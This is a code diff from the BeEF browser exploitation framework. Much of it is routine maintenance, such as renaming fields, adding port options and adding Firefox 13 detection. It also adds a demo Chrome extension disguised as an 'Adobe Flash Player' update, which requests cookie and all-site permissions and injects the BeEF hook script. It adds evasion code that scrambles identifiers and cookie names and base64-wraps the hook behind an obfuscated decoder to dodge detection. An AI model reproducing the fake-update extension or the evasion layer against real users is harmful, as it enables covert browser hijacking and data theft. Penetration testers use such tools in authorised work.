diff --git a/README.mkd b/README.mkd index 4396db7cd..79df0d1af 100644 --- a/README.mkd +++ b/README.mkd @@ -72,13 +72,13 @@ __The following is for the impatient.__ For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) + $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) Usage ----- -To get started, simply execute beef and follow the instrustions: +To get started, simply execute beef and follow the instructions: - $ ./beef + $ ./beef diff --git a/beef b/beef index b99cc5672..6302be317 100755 --- a/beef +++ b/beef @@ -59,6 +59,15 @@ if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true BeEF::Core::Console::Banners.print_ascii_art end +# @note Check if port and WebSocket port need to be updated from command line parameters +unless BeEF::Core::Console::CommandLine.parse[:port].empty? + config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port]) +end + +unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty? + config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port]) +end + # @note Prints BeEF welcome message BeEF::Core::Console::Banners.print_welcome_msg @@ -115,7 +124,7 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}" #@note Starts the WebSocket server if config.get("beef.http.websocket.enable") BeEF::Core::Websocket::Websocket.instance - print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port")}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]" end diff --git a/core/filters/browser.rb b/core/filters/browser.rb index 0bf881883..f955fb6f6 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb @@ -78,10 +78,10 @@ module Filters true end - # Verify the screen params are valid + # Verify the screen size is valid # @param [String] str String for testing - # @return [Boolean] If the string has valid screen param characters - def self.is_valid_screen_params?(str) + # @return [Boolean] If the string has valid screen size characters + def self.is_valid_screen_size?(str) return false if has_non_printable_char?(str) return false if str.length > 200 true @@ -105,6 +105,15 @@ module Filters true end + # Verify the date stamp is valid + # @param [String] str String for testing + # @return [Boolean] If the string has valid date stamp characters + def self.is_valid_date_stamp?(str) + return false if has_non_printable_char?(str) + return false if str.length > 200 + true + end + # Verify the browser_plugins string is valid # @param [String] str String for testing # @return [Boolean] If the string has valid browser plugin characters diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 53d6505e5..762072108 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -166,10 +166,18 @@ beef.browser = { /** * Returns true if FF12 -* @example: beef.browser.isFF12() + * @example: beef.browser.isFF12() */ isFF12: function() { -return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; + }, + + /** + * Returns true if FF13 + * @example: beef.browser.isFF13() + */ + isFF13: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; }, /** @@ -177,7 +185,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo * @example: beef.browser.isFF() */ isFF: function() { - return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12(); + return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13(); }, /** @@ -411,6 +419,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo FF10: this.isFF10(), // Firefox 10 FF11: this.isFF11(), // Firefox 11 FF12: this.isFF12(), // Firefox 12 + FF13: this.isFF13(), // Firefox 13 FF: this.isFF(), // Firefox any version IE6: this.isIE6(), // Internet Explorer 6 @@ -468,6 +477,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo if (this.isFF10()) { return '10' }; // Firefox 10 if (this.isFF11()) { return '11' }; // Firefox 11 if (this.isFF12()) { return '12' }; // Firefox 12 + if (this.isFF13()) { return '13' }; // Firefox 13 if (this.isIE6()) { return '6' }; // Internet Explorer 6 if (this.isIE7()) { return '7' }; // Internet Explorer 7 @@ -704,7 +714,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo /** * Returns zombie screen size and color depth. */ - getScreenParams: function() { + getScreenSize: function() { return { width: window.screen.width, height: window.screen.height, @@ -753,10 +763,11 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo var hostname = document.location.hostname; var hostport = (document.location.port)? document.location.port : "80"; var browser_plugins = beef.browser.getPlugins(); + var date_stamp = new Date().toString(); var os_name = beef.os.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); - var screen_params = beef.browser.getScreenParams(); + var screen_size = beef.browser.getScreenSize(); var window_size = beef.browser.getWindowSize(); var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; @@ -778,9 +789,10 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo if(hostport) details["HostPort"] = hostport; if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; + if(date_stamp) details['DateStamp'] = date_stamp; if(system_platform) details['SystemPlatform'] = system_platform; if(browser_type) details['BrowserType'] = browser_type; - if(screen_params) details['ScreenParams'] = screen_params; + if(screen_size) details['ScreenSize'] = screen_size; if(window_size) details['WindowSize'] = window_size; if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js index 656d41c6a..bdea5eb35 100644 --- a/core/main/client/browser/popup.js +++ b/core/main/client/browser/popup.js @@ -25,7 +25,7 @@ beef.browser.popup = { blocker_enbabled: function () { - screenParams = beef.browser.getScreenParams(); + screenParams = beef.browser.getScreenSize(); var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); if (popUp == null || typeof(popUp)=='undefined') { return true; @@ -36,4 +36,4 @@ beef.browser.popup = { } }; -beef.regCmp('beef.browser.popup'); \ No newline at end of file +beef.regCmp('beef.browser.popup'); diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index b51a781a4..626b36ce8 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js @@ -177,7 +177,7 @@ beef.mitb = { target.innerHTML = y.responseText; setTimeout(beef.mitb.hook, 10); } - } + }; y.send(query); beef.mitb.sniff("POST: " + url + "[" + query + "]"); return true; @@ -227,7 +227,7 @@ beef.mitb = { target.innerHTML = y.responseText; setTimeout(beef.mitb.hook, 10); } - } + }; y.send(null); beef.mitb.sniff("GET: " + url); diff --git a/core/main/console/commandline.rb b/core/main/console/commandline.rb index 340e79135..1ad2fa025 100644 --- a/core/main/console/commandline.rb +++ b/core/main/console/commandline.rb @@ -26,6 +26,9 @@ module BeEF @options[:resetdb] = false @options[:ascii_art] = false @options[:ext_config] = "" + @options[:port] = "" + @options[:ws_port] = "" + @already_parsed = false @@ -53,6 +56,14 @@ module BeEF opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f| @options[:ext_config] = f end + + opts.on('-p', '--port PORT', 'Change the default BeEF listening port') do |p| + @options[:port] = p + end + + opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port| + @options[:ws_port] = ws_port + end end optparse.parse! diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index 862e20770..dfb3b8040 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -118,6 +118,14 @@ module BeEF self.err_msg "Invalid operating system name returned from the hook browser's initial connection." end + # get and store the date + date_stamp = get_param(@data['results'], 'DateStamp') + if BeEF::Filters.is_valid_date_stamp?(date_stamp) + BD.set(session_id, 'DateStamp', date_stamp) + else + self.err_msg "Invalid date returned from the hook browser's initial connection." + end + # get and store page title page_title = get_param(@data['results'], 'PageTitle') if BeEF::Filters.is_valid_pagetitle?(page_title) @@ -175,11 +183,11 @@ module BeEF end # get and store the zombie screen size and color depth - screen_params = get_param(@data['results'], 'ScreenParams') - if BeEF::Filters.is_valid_screen_params?(screen_params) - BD.set(session_id, 'ScreenParams', screen_params) + screen_size = get_param(@data['results'], 'ScreenSize') + if BeEF::Filters.is_valid_screen_size?(screen_size) + BD.set(session_id, 'ScreenSize', screen_size) else - self.err_msg "Invalid screen params returned from the hook browser's initial connection." + self.err_msg "Invalid screen size returned from the hook browser's initial connection." end # get and store the window size diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 2b8125c11..92473876d 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -77,7 +77,7 @@ module Modules if config.get("beef.extension.evasion.enable") evasion = BeEF::Extension::Evasion::Evasion.instance - @hook = evasion.obfuscate(@hook) + @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook) end @body << @hook diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb index 25c11865d..9d7646614 100644 --- a/core/main/handlers/modules/command.rb +++ b/core/main/handlers/modules/command.rb @@ -50,26 +50,34 @@ module BeEF build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty? ws = BeEF::Core::Websocket::Websocket.instance + + if config.get("beef.extension.evasion.enable") + evasion = BeEF::Extension::Evasion::Evasion.instance + @output = evasion.obfuscate(command_module.output) + else + @output = command_module.output + end + #todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session) - content = command_module.output.gsub('// - // Copyright 2012 Wade Alcorn wade@bindshell.net - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. - //', "") - ws.send(content, hooked_browser.session) + #content = command_module.output.gsub('// + #// Copyright 2012 Wade Alcorn wade@bindshell.net + #// + #// Licensed under the Apache License, Version 2.0 (the "License"); + #// you may not use this file except in compliance with the License. + #// You may obtain a copy of the License at + #// + #// http://www.apache.org/licenses/LICENSE-2.0 + #// + #// Unless required by applicable law or agreed to in writing, software + #// distributed under the License is distributed on an "AS IS" BASIS, + #// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + #// See the License for the specific language governing permissions and + #// limitations under the License. + #//', "") + ws.send(@output, hooked_browser.session) else - @body << command_module.output + "\n\n" + @body << @output + "\n\n" end # @note prints the event to the console if BeEF::Settings.console? diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index 17d757e29..b30573a0d 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -119,21 +119,36 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the date stamp + date_stamp = BD.get(zombie_session, 'DateStamp') + if not date_stamp.nil? + encoded_date_stamp = CGI.escapeHTML(date_stamp) + encoded_date_stamp_hash = { 'Date' => encoded_date_stamp } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_date_stamp_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the os name os_name = BD.get(zombie_session, 'OsName') if not host_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } - + page_name_row = { 'category' => 'Host', 'data' => encoded_os_name_hash, 'from' => 'Initialization' } - + summary_grid_hash['results'].push(page_name_row) # add the row end - + # set and add the return values for the browser name browser_name = BD.get(zombie_session, 'BrowserName') if not browser_name.nil? @@ -224,24 +239,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController end # set and add the zombie screen size and color depth - screen_params = BD.get(zombie_session, 'ScreenParams') - if not screen_params.nil? + screen_size = BD.get(zombie_session, 'ScreenSize') + if not screen_size.nil? - screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON - width = screen_params_hash['width'] + screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON + width = screen_size_hash['width'] (print_error "width is wrong type";return) if not width.is_a?(Fixnum) - height = screen_params_hash['height'] + height = screen_size_hash['height'] (print_error "height is wrong type";return) if not height.is_a?(Fixnum) - colordepth = screen_params_hash['colordepth'] + colordepth = screen_size_hash['colordepth'] (print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum) # construct the string to be displayed in the details tab - encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) - encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params } + encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) + encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size } page_name_row = { 'category' => 'Host', - 'data' => encoded_screen_params_hash, + 'data' => encoded_screen_size_hash, 'from' => 'Initialization' } diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index 927686cb7..a896184cb 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb @@ -328,21 +328,36 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the date + date_stamp = BD.get(self.targetsession, 'DateStamp') + if not date_stamp.nil? + encoded_date_stamp = CGI.escapeHTML(date_stamp) + encoded_date_stamp_hash = { 'Date' => encoded_date_stamp } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_date_stamp, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the os name os_name = BD.get(self.targetsession, 'OsName') if not os_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } - + page_name_row = { 'category' => 'Host', 'data' => encoded_os_name_hash, 'from' => 'Initialization' } - + summary_grid_hash['results'].push(page_name_row) # add the row end - + # set and add the return values for the browser name browser_name = BD.get(self.targetsession, 'BrowserName') if not browser_name.nil? @@ -433,21 +448,21 @@ class ShellInterface end # set and add the zombie screen size and color depth - screen_params = BD.get(self.targetsession, 'ScreenParams') - if not screen_params.nil? + screen_size = BD.get(self.targetsession, 'ScreenSize') + if not screen_size.nil? - screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON - width = screen_params_hash['width'] - height = screen_params_hash['height'] - colordepth = screen_params_hash['colordepth'] + screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON + width = screen_size_hash['width'] + height = screen_size_hash['height'] + colordepth = screen_size_hash['colordepth'] # construct the string to be displayed in the details tab - encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) - encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params } + encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) + encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size } page_name_row = { 'category' => 'Host', - 'data' => encoded_screen_params_hash, + 'data' => encoded_screen_size_hash, 'from' => 'Initialization' } diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js new file mode 100644 index 000000000..e20376b0e --- /dev/null +++ b/extensions/demos/flash_update_chrome_extension/background.js @@ -0,0 +1,4 @@ +d=document; +e=d.createElement('script'); +e.src="http://127.0.0.1:3000/hook.js"; +d.body.appendChild(e); diff --git a/extensions/demos/flash_update_chrome_extension/icon128.png b/extensions/demos/flash_update_chrome_extension/icon128.png new file mode 100644 index 000000000..58a6ecc85 Binary files /dev/null and b/extensions/demos/flash_update_chrome_extension/icon128.png differ diff --git a/extensions/demos/flash_update_chrome_extension/icon16.png b/extensions/demos/flash_update_chrome_extension/icon16.png new file mode 100644 index 000000000..855e228e8 Binary files /dev/null and b/extensions/demos/flash_update_chrome_extension/icon16.png differ diff --git a/extensions/demos/flash_update_chrome_extension/icon48.png b/extensions/demos/flash_update_chrome_extension/icon48.png new file mode 100644 index 000000000..2f4cd2b7c Binary files /dev/null and b/extensions/demos/flash_update_chrome_extension/icon48.png differ diff --git a/extensions/demos/flash_update_chrome_extension/manifest.json b/extensions/demos/flash_update_chrome_extension/manifest.json new file mode 100644 index 000000000..7e2c4fa44 --- /dev/null +++ b/extensions/demos/flash_update_chrome_extension/manifest.json @@ -0,0 +1,26 @@ +{ + // Simple chrome extension + // Just loads beef into the extension context. + // + // You may need to set the IP address of the beef hook in background.js + // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/ + + "name": "Adobe Flash Player", + "version": "11.2.202.235", + "description": "Introduces vulnerabilites into web browsers", + "background": { + "scripts": ["background.js"] + }, + "icons": { + "16": "icon16.png", + "48": "icon48.png", + "128": "icon128.png" + }, + "permissions": [ + "tabs", + "http://*/*", + "https://*/*", + "file://*/*", + "cookies" + ] +} diff --git a/extensions/demos/html/adobe_flash_update.crx b/extensions/demos/html/adobe_flash_update.crx new file mode 100644 index 000000000..91a0af8c8 Binary files /dev/null and b/extensions/demos/html/adobe_flash_update.crx differ diff --git a/extensions/demos/html/adobe_flash_update.png b/extensions/demos/html/adobe_flash_update.png new file mode 100644 index 000000000..9f0278e6b Binary files /dev/null and b/extensions/demos/html/adobe_flash_update.png differ diff --git a/extensions/demos/html/clickjack.html b/extensions/demos/html/clickjack.html new file mode 100644 index 000000000..486fe35b0 --- /dev/null +++ b/extensions/demos/html/clickjack.html @@ -0,0 +1,4 @@ +

 

+moooooooo +

 

+ diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml index d8603a43d..b708a9ecb 100644 --- a/extensions/evasion/config.yaml +++ b/extensions/evasion/config.yaml @@ -20,5 +20,9 @@ beef: name: 'Evasion' authors: ["antisnatchor"] scramble_variables: true - to_scramble: ["beef", "Beef"] + scramble_cookies: true + scramble: + beef: "beef" + Beef: "Beef" + evercookie: "evercookie" chain: ["scramble","minify","base_64"] \ No newline at end of file diff --git a/extensions/evasion/evasion.rb b/extensions/evasion/evasion.rb index 1ce45b1e7..b86cca957 100644 --- a/extensions/evasion/evasion.rb +++ b/extensions/evasion/evasion.rb @@ -29,6 +29,26 @@ module BeEF @input = apply_chain(input, @@techniques) end + def add_bootstrapper + @bootstrap = '' + # add stuff at the end, only once (when serving the initial init javascript) + @@techniques.each do |technique| + #1. get the ruby module inside the obfuscation directory: the file name will be the same of the string used in "chain" + #2. call the "execute" method of the ruby module, passing the input + #3. update the input in order that next technique will work on the pre-processed input. + if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb") + print_debug "[OBFUSCATION] Applying technique [#{technique}]" + klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance + is_bootstrap_needed = klass.need_bootstrap + if is_bootstrap_needed + @bootstrap += klass.get_bootstrap + end + end + @bootstrap + end + @bootstrap + end + def apply_chain(input, techniques) @output = input techniques.each do |technique| @@ -37,8 +57,7 @@ module BeEF #3. update the input in order that next technique will work on the pre-processed input. if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb") print_debug "[OBFUSCATION] Applying technique [#{technique}]" - klass = BeEF::Extension::Evasion.const_get(technique.capitalize) - klass = klass.instance + klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance @output = klass.execute(@output, @@config) end @output diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb index dc81f5200..ce1fc360e 100644 --- a/extensions/evasion/extension.rb +++ b/extensions/evasion/extension.rb @@ -26,6 +26,7 @@ end end require 'extensions/evasion/evasion' +require 'extensions/evasion/helper' require 'extensions/evasion/obfuscation/scramble' require 'extensions/evasion/obfuscation/minify' require 'extensions/evasion/obfuscation/base_64' diff --git a/extensions/evasion/helper.rb b/extensions/evasion/helper.rb new file mode 100644 index 000000000..68eb9c3b0 --- /dev/null +++ b/extensions/evasion/helper.rb @@ -0,0 +1,33 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF + module Extension + module Evasion + # Common methods used by multiple obfuscation techniques + module Helper + + def self.random_string(length=5) + chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ' + result = '' + length.times { result << chars[rand(chars.size)] } + result + end + + end + end + end +end + diff --git a/extensions/evasion/obfuscation/base_64.rb b/extensions/evasion/obfuscation/base_64.rb index 27c8e960a..cf8a55309 100644 --- a/extensions/evasion/obfuscation/base_64.rb +++ b/extensions/evasion/obfuscation/base_64.rb @@ -19,19 +19,20 @@ module BeEF class Base_64 include Singleton - def random_string(length=5) - chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ' - result = '' - length.times { result << chars[rand(chars.size)] } - result + def need_bootstrap + true + end + + def get_bootstrap + # the decode function is obfuscated, and it's called "dec" (see below in "execute", where it is used) + decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};' end def execute(input, config) encoded = Base64.strict_encode64(input) # basically, use atob if supported otherwise a normal base64 JS implementation (ie.: IE :-) - decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};' - var_name = random_string(3) - input = "var #{var_name}=\"#{encoded}\";#{decode_function}[].constructor.constructor(dec(#{var_name}))();" + var_name = BeEF::Extension::Evasion::Helper::random_string(3) + input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(dec(#{var_name}))();" print_debug "[OBFUSCATION - BASE64] Javascript has been base64'ed'" input end diff --git a/extensions/evasion/obfuscation/minify.rb b/extensions/evasion/obfuscation/minify.rb index ec15424d5..048d5d53b 100644 --- a/extensions/evasion/obfuscation/minify.rb +++ b/extensions/evasion/obfuscation/minify.rb @@ -19,6 +19,11 @@ module BeEF require 'jsmin' class Minify include Singleton + + def need_bootstrap + false + end + def execute(input, config) input = JSMin.minify(input) print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified" diff --git a/extensions/evasion/obfuscation/scramble.rb b/extensions/evasion/obfuscation/scramble.rb index c1450ee38..d14ca5cff 100644 --- a/extensions/evasion/obfuscation/scramble.rb +++ b/extensions/evasion/obfuscation/scramble.rb @@ -19,28 +19,44 @@ module BeEF class Scramble include Singleton - def random_string(length=5) - chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ' - result = '' - length.times { result << chars[rand(chars.size)] } - result + def need_bootstrap + false end def execute(input, config) - to_scramble = config.get('beef.extension.evasion.to_scramble') - to_scramble.each do |var| - mod_var = random_string - input = input.gsub!(var,random_string) - print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]" + @output = input - #todo: add scrambled vars to an Hash. - #todo: even better. Add them to the Configuration object, like "beef" => "cnjD3" - #@@to_scramble = config.get('beef.http.evasion.scramble_variables') - #@@scrambled = Hash.new + to_scramble = config.get('beef.extension.evasion.scramble') + to_scramble.each do |var, value| + if var == value + # Variables have not been scrambled yet + mod_var = BeEF::Extension::Evasion::Helper::random_string(3) + @output.gsub!(var,mod_var) + config.set("beef.extension.evasion.scramble.#{var}",mod_var) + print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]" + else + # Variables already scrambled, re-use the one already created to maintain consistency + @output.gsub!(var,value) + print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{value}]" + end + @output end - input - end + if config.get('beef.extension.evasion.scramble_cookies') + # ideally this should not be static, but it's static in JS code, so fine for nowend + mod_cookie = BeEF::Extension::Evasion::Helper::random_string(5) + if config.get('beef.http.hook_session_name') == "BEEFHOOK" + @output.gsub!("BEEFHOOK",mod_cookie) + config.set('beef.http.hook_session_name',mod_cookie) + print_debug "[OBFUSCATION - SCRAMBLER] cookie [BEEFHOOK] scrambled -> [#{mod_cookie}]" + else + @output.gsub!("BEEFHOOK",config.get('beef.http.hook_session_name')) + print_debug "[OBFUSCATION - SCRAMBLER] cookie 